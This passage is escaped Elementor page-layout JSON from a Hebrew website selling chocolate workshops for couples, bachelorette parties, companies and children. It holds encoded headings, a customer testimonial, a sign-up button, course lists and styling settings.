\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 